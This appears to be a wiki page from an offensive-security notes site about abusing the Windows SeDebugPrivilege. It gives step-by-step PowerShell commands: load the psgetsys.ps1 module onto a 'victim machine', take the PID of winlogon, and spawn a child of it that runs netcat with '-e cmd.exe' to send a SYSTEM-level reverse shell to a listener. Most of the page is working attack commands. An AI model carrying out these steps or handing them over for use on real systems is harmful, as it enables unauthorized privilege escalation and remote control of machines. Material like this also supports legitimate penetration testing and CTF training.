SeDebugPrivilege

From RCATs
Revision as of 05:09, 21 August 2023 by Ali3nw3rx (talk | contribs) (Created page with "You can update update proc attribute list with this privilege and can elevate privileges. Use the module below to do that. ===== Module: ===== <syntaxhighlight lang="powershell"> https://github.com/decoder-it/psgetsystem/blob/master/psgetsys.ps1 </syntaxhighlight>Get the above ps1 on the victim machine. Then run:<syntaxhighlight lang="powershell"> import-module .\psgetsys.ps1 </syntaxhighlight>Find pid of a process that is privileged.<syntaxhighlight lang="powershell">...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

You can update update proc attribute list with this privilege and can elevate privileges. Use the module below to do that.

Module:
https://github.com/decoder-it/psgetsystem/blob/master/psgetsys.ps1

Get the above ps1 on the victim machine. Then run:

import-module .\psgetsys.ps1

Find pid of a process that is privileged.

Get-Process winlogon

Use that pid to attach & execute commands.

[MyProcess]::CreateProcessFromParent("552","c:\windows\system32\cmd.exe", "/c c:\windows\temp\nc.exe 127.0.0.1 4444 -e cmd.exe")

Note:

1. Make sure to have netcat uploaded to the specified file path in the above command.
2. If you close the shell you have to do the whole process again to get another shell
3. Make sure you set up a nc listener to catch the admin shell.
Retrieved from "https://rcats.dev/rcats/index.php?title=SeDebugPrivilege&oldid=922"